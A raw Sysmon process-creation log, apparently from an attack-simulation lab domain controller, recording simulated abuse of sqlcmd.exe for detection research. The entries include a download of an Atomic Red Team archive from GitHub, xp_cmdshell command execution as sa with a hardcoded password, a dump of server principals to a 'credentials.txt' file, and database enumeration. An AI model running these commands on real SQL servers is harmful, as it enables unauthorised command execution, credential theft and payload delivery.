154100x8000000000000000124608Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:50:24.359{39524062-2980-679d-5304-000000000402}4796C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -?C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124553Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:40:41.351{39524062-2739-679d-1b04-000000000402}4324C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -i https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip -o C:\T1105.zipC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124343Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:54.388{39524062-1f8a-679d-5903-000000000402}7232C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S localhost -U sa -P password123 -Q "EXEC xp_cmdshell 'whoami'" -o C:\Windows\Temp\output.txtC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124342Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:52.295{39524062-1f88-679d-5803-000000000402}7692C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S 127.0.0.1 -Q "SELECT name FROM master.sys.databases; SELECT name FROM master.sys.tables" -EC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124341Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:07:50.228{39524062-1f86-679d-5703-000000000402}2716C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -S localhost -Q "SELECT * FROM master.sys.server_principals" -o C:\Users\Public\credentials.txtC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124304Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 19:00:51.051{39524062-1de3-679d-3103-000000000402}8004C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe" -?C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124287Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 18:57:17.130{39524062-1d0d-679d-2003-000000000402}6084C:\Windows\System32\find.exe10.0.20348.1 (WinBuild.160101.0800)Find String (grep) UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationFIND.EXE"C:\Windows\system32\find.exe" sqlcmd.exeC:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=97CD3C52680200280B2F2D39A67CC4F9,SHA256=7EAFBD12C5E2BA1172B225655DBEFD7A6081FBF803D553BE0ED5990EF5331973,IMPHASH=53D01F599FA823367954405BF5F690B3{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x8000000000000000124281Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-01-31 18:57:04.697{39524062-1d00-679d-1a03-000000000402}1388C:\Program Files\SqlCmd\sqlcmd.exev1.6.0T-SQL execution command line utilityMicrosoft SQL ServerMicrosoft Corporationsqlcmd.exe"C:\Program Files\SqlCmd\sqlcmd.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{39524062-1c55-679d-f463-200000000000}0x2063f42HighMD5=CB9145D77A9D2B312599B135C7B44492,SHA256=ADC49E6C31B6A02BAEFD9EF828CF2B9325F33A8A6AC7C48E651428656C913127,IMPHASH=9CBEFE68F395E67356E2A5D8D1B285C0{39524062-1cfe-679d-1603-000000000402}7916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator